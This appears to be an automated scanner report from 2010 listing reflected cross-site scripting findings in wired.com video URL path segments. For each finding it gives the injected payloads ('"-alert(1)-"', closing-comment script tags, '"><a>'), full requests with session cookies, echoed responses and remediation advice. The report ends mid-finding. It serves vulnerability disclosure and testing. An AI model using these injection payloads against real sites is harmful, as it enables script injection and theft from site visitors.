Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/highlights/1716440574/behind-the-scenes-of-atts-distaster-response-team76354"-alert(1)-"5b79ff964c2/648526227001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:50:07 GMT Date: Mon, 22 Nov 2010 00:45:07 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106713
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... vascript">
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e566d"-alert(1)-"c72dc9190e1 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/highlights/1716440574/behind-the-scenes-of-atts-distaster-response-team/648526227001e566d"-alert(1)-"c72dc9190e1 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:50:15 GMT Date: Mon, 22 Nov 2010 00:45:15 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106777
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 1 is copied into an HTML comment. The payload 4d894--><script>alert(1)</script>cea20fcb24e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /video4d894--><script>alert(1)</script>cea20fcb24e/latest-videos/highlights/1716440574/call-of-duty--afghanistan/664893966001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29463 Vary: Accept-Encoding Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:51:19 GMT Date: Mon, 22 Nov 2010 00:46:19 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <!-- Exception message: URL not found: /video4d894--><script>alert(1)</script>cea20fcb24e/latest-videos/highlights/1716440574/call-of-duty--afghanistan/664893966001 --> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 201d0"><a>ebd28a3fec was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video201d0"><a>ebd28a3fec/latest-videos/highlights/1716440574/call-of-duty--afghanistan/664893966001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29426 Vary: Accept-Encoding Cache-Control: max-age=293 Expires: Mon, 22 Nov 2010 00:50:32 GMT Date: Mon, 22 Nov 2010 00:45:39 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_video201d0"><a>ebd28a3fec ss_latest-videos c_highlights"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 62258"-alert(1)-"919fafaaa81 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos62258"-alert(1)-"919fafaaa81/highlights/1716440574/call-of-duty--afghanistan/664893966001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:52:26 GMT Date: Mon, 22 Nov 2010 00:47:26 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106781
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 52b9d"><a>211a0831db4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/latest-videos52b9d"><a>211a0831db4/highlights/1716440574/call-of-duty--afghanistan/664893966001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=292 Expires: Mon, 22 Nov 2010 00:51:12 GMT Date: Mon, 22 Nov 2010 00:46:20 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106767
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_latest-videos52b9d"><a>211a0831db4 c_highlights"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c8141"-alert(1)-"10ca6e21fc9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/highlightsc8141"-alert(1)-"10ca6e21fc9/1716440574/call-of-duty--afghanistan/664893966001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:53:32 GMT Date: Mon, 22 Nov 2010 00:48:32 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106717
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f84f6"><a>f02232e9b59 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/latest-videos/highlightsf84f6"><a>f02232e9b59/1716440574/call-of-duty--afghanistan/664893966001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:52:34 GMT Date: Mon, 22 Nov 2010 00:47:34 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106774
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_latest-videos c_highlightsf84f6"><a>f02232e9b59"> ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 68f9c"-alert(1)-"1deb7ddd208 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/highlights/171644057468f9c"-alert(1)-"1deb7ddd208/call-of-duty--afghanistan/664893966001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=275 Expires: Mon, 22 Nov 2010 00:53:17 GMT Date: Mon, 22 Nov 2010 00:48:42 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106750
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 69d61"-alert(1)-"8d2a6e6c54f was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/highlights/1716440574/call-of-duty--afghanistan69d61"-alert(1)-"8d2a6e6c54f/664893966001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:54:00 GMT Date: Mon, 22 Nov 2010 00:49:00 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106750
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 36c3a"-alert(1)-"d453e615d9 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/highlights/1716440574/call-of-duty--afghanistan/66489396600136c3a"-alert(1)-"d453e615d9 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=298 Expires: Mon, 22 Nov 2010 00:54:11 GMT Date: Mon, 22 Nov 2010 00:49:13 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106749
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4fd83"><a>ad70241ee00 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video4fd83"><a>ad70241ee00/latest-videos/highlights/1716440574/cast-and-crew-talk-tron-reboot-secondskin-light-suits/678922783001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29456 Vary: Accept-Encoding Cache-Control: max-age=280 Expires: Mon, 22 Nov 2010 00:46:40 GMT Date: Mon, 22 Nov 2010 00:42:00 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_video4fd83"><a>ad70241ee00 ss_latest-videos c_highlights"> ...[SNIP]...
The value of REST URL parameter 1 is copied into an HTML comment. The payload e30a8--><script>alert(1)</script>a31e866130d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /videoe30a8--><script>alert(1)</script>a31e866130d/latest-videos/highlights/1716440574/cast-and-crew-talk-tron-reboot-secondskin-light-suits/678922783001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29491 Vary: Accept-Encoding Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:47:56 GMT Date: Mon, 22 Nov 2010 00:42:56 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <!-- Exception message: URL not found: /videoe30a8--><script>alert(1)</script>a31e866130d/latest-videos/highlights/1716440574/cast-and-crew-talk-tron-reboot-secondskin-light-suits/678922783001 --> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 332c2"><a>91f441f5d3c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/latest-videos332c2"><a>91f441f5d3c/highlights/1716440574/cast-and-crew-talk-tron-reboot-secondskin-light-suits/678922783001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:47:56 GMT Date: Mon, 22 Nov 2010 00:42:56 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106802
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_latest-videos332c2"><a>91f441f5d3c c_highlights"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1b06d"-alert(1)-"2d478deefda was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos1b06d"-alert(1)-"2d478deefda/highlights/1716440574/cast-and-crew-talk-tron-reboot-secondskin-light-suits/678922783001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=275 Expires: Mon, 22 Nov 2010 00:48:50 GMT Date: Mon, 22 Nov 2010 00:44:15 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106791
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1e351"-alert(1)-"ee6ab5df533 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/highlights1e351"-alert(1)-"ee6ab5df533/1716440574/cast-and-crew-talk-tron-reboot-secondskin-light-suits/678922783001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:50:38 GMT Date: Mon, 22 Nov 2010 00:45:38 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106809
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d18f2"><a>756b85c7199 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/latest-videos/highlightsd18f2"><a>756b85c7199/1716440574/cast-and-crew-talk-tron-reboot-secondskin-light-suits/678922783001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=274 Expires: Mon, 22 Nov 2010 00:48:57 GMT Date: Mon, 22 Nov 2010 00:44:23 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106777
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_latest-videos c_highlightsd18f2"><a>756b85c7199"> ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 39664"-alert(1)-"96d7430c046 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
